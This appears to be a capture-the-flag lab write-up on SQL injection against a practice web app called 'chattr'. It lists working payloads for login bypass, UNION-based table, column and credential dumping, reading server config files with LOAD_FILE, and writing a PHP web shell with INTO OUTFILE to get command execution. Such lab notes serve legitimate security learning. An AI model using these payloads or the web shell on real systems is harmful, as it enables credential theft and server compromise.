SQL Injection Fundamentals

# Initial Enum - Ping test ![[images/Pasted image 20251205192427.png]] - Nmap scan ![[images/Pasted image 20251205192434.png]] - Visit page in browser ![[images/Pasted image 20251205192507.png]] - Random content - Getting interesting error message in address bar ![[images/Pasted image 20251205192541.png]] - admin:admin doesn't work - admin:sqli strings don't work - try register page ![[images/Pasted image 20251205194059.png]] - send test to repeater tab ![[images/Pasted image 20251205194136.png]] - add single quote escape > 500 error ![[images/Pasted image 20251205194202.png]] - try appending `'or '1'='1` > 302 code ![[images/Pasted image 20251205194323.png]] - try appending `') OR 1=1-- —` > 302 code with successful account creation # Determine password hash for `admin` - login with new test account ![[images/Pasted image 20251205194944.png]] - try search feature ![[images/Pasted image 20251205195015.png]] - send to repeater tab and add single quote escape to search string > 500 error ![[images/Pasted image 20251205195125.png]] - append `') -- -` to search string > 200 OK ![[images/Pasted image 20251205195256.png]] - we have SQL injection - determine number of columns for UNION payloads - 200 OK on 4 columns ![[images/Pasted image 20251205195703.png]] - 3, 4 are returned with the convo pane > these are the injection points ![[images/Pasted image 20251205195958.png]] - insert `@@version` for 3 ![[images/Pasted image 20251205200023.png]] - insert `database()` for 4 ![[images/Pasted image 20251205200109.png]] - list tables with following UNION payload: `index.php?q=abc%27)+UNION+select+1,2,TABLE_NAME,TABLE_SCHEMA+from+INFORMATION_SCHEMA.TABLES+where+table_schema=%27chattr%27--+-&u=1`![[images/Pasted image 20251205200958.png]] - enumerate columns with following union payload: `index.php?q=abc%27)%20UNION%20SELECT%201,2,COLUMN_NAME,TABLE_NAME%20from%20INFORMATION_SCHEMA.COLUMNS%20where%20table_name=%27Users%27--%20-&u=1` ![[images/Pasted image 20251205201112.png]] - grab username:password from from chattr.Users table with following UNION payload: `index.php?q=abc%27)%20UNION%20SELECT%201,2,username,password%20from%20chattr.Users--%20-&u=1` ![[images/Pasted image 20251205201230.png]] # Determine webroot - nginx webroot set by the config file in `/etc/nginx/nginx.conf` - usually in one of two places - `/usr/share/nginx/www` - `/usr/share/nginx/html` - read `/etc/nginx/nginx.config` with following UNION payload `index.php?q=abc%27)%20UNION%20SELECT%201,%202,LOAD_FILE("/etc/nginx/nginx.conf"),%204--%20-&u=1` based on `cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -` ![[images/Pasted image 20251205202008.png]] - read `/etc/nginx/sites-enabled/default` with similar UNION payload to above ![[images/Pasted image 20251205202305.png]] - webroot is shown as ![[images/Pasted image 20251205202338.png]] # Achieve RCE for flag - try for RCE using the following UNION payload ```mysql ') union select "",:"",'<?php system($_REQUEST["cmd"]); ?>',"" into outfile '/var/www/chattr-prod/shell.php'-- - ``` - no errors ![[images/Pasted image 20251205202638.png]] - visit shell.php > 404 error ![[images/Pasted image 20251205202904.png]] - retry with following revised UNION payload ```mysql ') union select 1,2,'<?php system($_REQUEST["cmd"]); ?>',4 into outfile '/var/www/chattr-prod/shell.php'-- - ``` - no errors ![[images/Pasted image 20251205203130.png]] - visit `php.shell?cmd=id` - success! ![[images/Pasted image 20251205203157.png]] - grab flag - first `cmd=ls /`![[images/Pasted image 20251205203343.png]] - second `cat /flag_876a4c.txt` ![[images/Pasted image 20251205203423.png]]